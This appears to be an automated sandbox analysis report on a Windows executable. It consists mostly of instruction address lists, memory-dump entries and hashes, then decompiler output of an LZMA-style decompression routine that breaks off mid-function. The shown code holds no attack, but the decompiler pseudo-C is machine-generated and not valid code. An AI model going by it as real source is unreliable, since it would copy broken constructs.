                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060ea
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067f8
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x0040686f
                                                                                                        0x0040682a
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x0040686f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x0040662d
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x00406899
                                                                                                        0x00406862

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                        • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                        • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                        • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
